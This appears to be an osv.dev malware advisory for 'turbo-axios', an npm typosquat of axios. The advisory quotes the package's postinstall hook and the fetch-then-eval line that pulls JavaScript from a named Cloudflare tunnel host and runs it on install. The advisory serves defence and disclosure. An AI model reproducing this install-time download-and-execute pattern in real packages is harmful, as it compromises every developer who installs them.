turbo-axios @1.17.3
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4695
Ecosystem
npm
Summary
turbo-axios is a typosquat of the popular axios HTTP client (it re-exports the full axios API and reuses axios's repository/homepage metadata in package.json) carrying an install-time remote code execution payload. package.json declares "postinstall": "node./lib/core/eval.js" . lib/core/eval.js performs fetch('https://consequences-faces-weblogs-clinical.trycloudflare.com/download/datab1') and then await eval( (async () => {\n${datab2}\n})(); ) , executing the response body as JavaScript inside an async IIFE. The destination is an anonymous, mutable Cloudflare quick-tunnel — not the publisher's infrastructure — and the fetched bytes are not pinned, hashed, or otherwise verified, so the attacker can ship arbitrary code to every installer at any time. The exfil/RCE function is misleadingly named sendAnalytics . Any npm install turbo-axios results in attacker-controlled code execution on the installer's machine with the privileges of the npm process.
Source: amazon-inspector (62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.